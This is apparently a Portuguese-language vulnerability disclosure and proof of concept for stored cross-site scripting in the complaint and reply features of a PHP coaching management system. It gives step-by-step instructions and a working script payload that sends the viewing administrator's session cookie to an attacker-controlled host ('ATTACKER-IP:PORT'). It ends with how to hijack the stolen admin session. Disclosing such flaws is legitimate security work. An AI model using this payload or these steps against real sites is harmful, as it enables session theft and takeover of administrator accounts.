
Prova de conceito de exploit para XSS armazenado (CWE-79) em um sistema de gerenciamento de coaching em PHP, demonstrando sequestro de sessão e escalonamento de privilégios de estudante para administrador por meio de roubo de cookies.
Sistema de Gerenciamento de Coaching em PHP (Code-Projects.org) https://code-projects.org/coaching-management-system-in-php-with-source-code/
Desconhecida (Nenhuma informação de versão fornecida pelo fornecedor; testado na versão mais recente disponível em Code-Projects.org em abril de 2026)
CWE-79: Neutralização Incorreta de Entrada Durante a Geração de Páginas Web (Cross-Site Scripting Armazenado)
O aplicativo não sanitiza adequadamente a entrada fornecida pelo usuário na funcionalidade de reclamação e resposta. JavaScript malicioso injetado por um usuário de baixo privilégio é armazenado e executado quando visualizado por usuários com privilégios mais altos, como administradores ou professores.
Além disso, a funcionalidade de resposta também é vulnerável, permitindo que administradores ou professores injetem JavaScript que é executado nas sessões dos alunos.
Isso resulta em uma vulnerabilidade de XSS armazenado que afeta múltiplas funções de usuário.
Faça login como aluno
Navegue até:
/modules/student/complaint.php

Envie uma reclamação com o seguinte payload:
<script>
new Image().src="http://ATTACKER-IP:PORT/?c="+document.cookie;
</script>
Faça login como administrador
Navegue até:
/modules/admin/incomingcomplaint.php

Quando o administrador visualiza a reclamação, o payload é executado automaticamente
O cookie de sessão do administrador é enviado para o servidor controlado pelo atacante
Use o cookie de sessão roubado para sequestrar a sessão do administrador

Severidade: CRÍTICA